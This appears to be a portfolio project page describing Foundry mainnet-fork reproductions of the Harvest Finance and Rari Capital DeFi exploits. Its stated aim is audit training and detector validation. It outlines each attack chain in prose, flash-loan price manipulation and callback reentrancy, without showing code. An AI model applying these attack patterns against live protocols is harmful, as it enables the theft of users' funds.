DeFi Exploit Reproduction & Analysis
Blockchain Development

DeFi Exploit Reproduction & Analysis

Foundry-based PoC reproductions of Harvest Finance (2020) and Rari Capital (2022) exploits with flash loan attack vectors

GitHub
Solidity Foundry Aave Uniswap V2 Compound

Problem

Public exploit reports describe attack vectors at a high level but rarely include reproducible test environments. Auditors and researchers must reverse-engineer historical incidents from raw transactions — an expensive prerequisite for building detector heuristics or training new auditors. A library of executable PoCs against mainnet state was missing for two of the most instructive 2020–2022 incidents.

Approach

  • Mainnet fork over abstract reproduction: Foundry’s fork-testing replays attacks against real protocol state, preserving oracle prices, liquidity depths, and contract bytecode that abstract reproductions lose.
  • Decoded original tx traces to identify the manipulable surface in each incident: Harvest’s dependency on a single Curve Y pool spot price, and Rari’s missing reentrancy guard on the Compound-fork borrow() callback path.
  • Real protocol composition: Wired Aave V1 flash loans + Uniswap V2 swaps for Harvest’s price manipulation; constructed cross-protocol callback chain (Aave → Rari Fuse → Uniswap callback) for Rari’s reentrancy.
  • Foundry over Hardhat for first-class fork-testing and assertion ergonomics on attack invariants.

Implementation

Harvest Finance (2020) — $34M

Flash-loan USDC/USDT via Aave V1 → manipulate yCurve stablecoin pool price through large Uniswap V2 swaps → deposit into Harvest vault at depressed share price → reverse swap to restore price → withdraw at restored price, profiting from the share-price delta. Demonstrates AMM-based oracle manipulation and vault share calculation exploitation in a single atomic block.

Rari Capital / Fei Protocol (2022) — $80M

Flash-loan DAI via Aave V1 → enter Rari Fuse pools (Compound fork) → exploit reentrancy during token transfer callback → re-enter through Uniswap V2 swap callback to drain additional collateral. Demonstrates ERC-777/callback-based reentrancy on Compound-style lending markets and cross-protocol composability risk.

Outcome

  • Two production-grade PoCs reproducing $114M of combined historical exploit value.
  • Suitable as audit training material, detector validation cases, and reference implementations for security researchers.
  • Concrete demonstrations of the two most common DeFi attack patterns of the era: AMM-based price manipulation and Compound-fork reentrancy.

Technologies

  • Framework: Foundry (mainnet-fork testing)
  • Protocols Analyzed: Aave V1, Uniswap V2, Harvest Finance, Compound/Rari
  • Language: Solidity
← Back to Projects